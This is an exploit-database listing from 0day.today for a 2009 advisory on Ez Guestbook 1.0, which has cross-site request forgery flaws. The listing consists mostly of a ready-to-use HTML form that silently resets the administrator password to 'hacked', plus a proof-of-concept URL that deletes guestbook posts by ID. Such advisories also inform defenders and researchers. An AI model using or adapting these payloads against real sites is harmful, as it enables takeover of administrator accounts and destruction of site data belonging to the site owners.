[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ez Guestbook 1.0 Multiple Vulnerabilities

Author
Milos Zivanovic
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10255
Category
web applications
Date add
14-12-2009
Platform
unsorted
=========================================
Ez Guestbook 1.0 Multiple Vulnerabilities
=========================================

[-------------------------------------------------------------------------------------------------]
[   Application: Ez Guestbook
                           ]
[   Version: 1.0
                           ]
[   Link: http://www.scriptsez.net/?action=details&cat=Guestbooks&id=11873094083
                 ]
[   Price: 10 USD
                           ]
[   Vulnerability: Cross Site Request Forgery
                           ]
[-------------------------------------------------------------------------------------------------]
 
Ez Guestbook script version 1.0 suffers from multiple vulnerabilities:
 
[#]Content
 |--Change admin password
 |--Remove post by ID
 
[*]Change admin password
 
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/ez_gb/admin.php?action=change_password"
method="post">
  <input type="hidden" name="admin_password" value="hacked">
  <input type="hidden" name="c_admin_password" value="hacked">
  <input type="hidden" name="add" value="true">
  <input type="submit" name="submit" value=" CHANGE ">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]
 
[+]Remove post by ID
 
[POC----------------------------------------------------------------------------------------------]
http://localhost/ez_gb/admin.php?action=view&do=delete&id=[ID]
[POC----------------------------------------------------------------------------------------------]



#  0day.today [2024-12-23]  #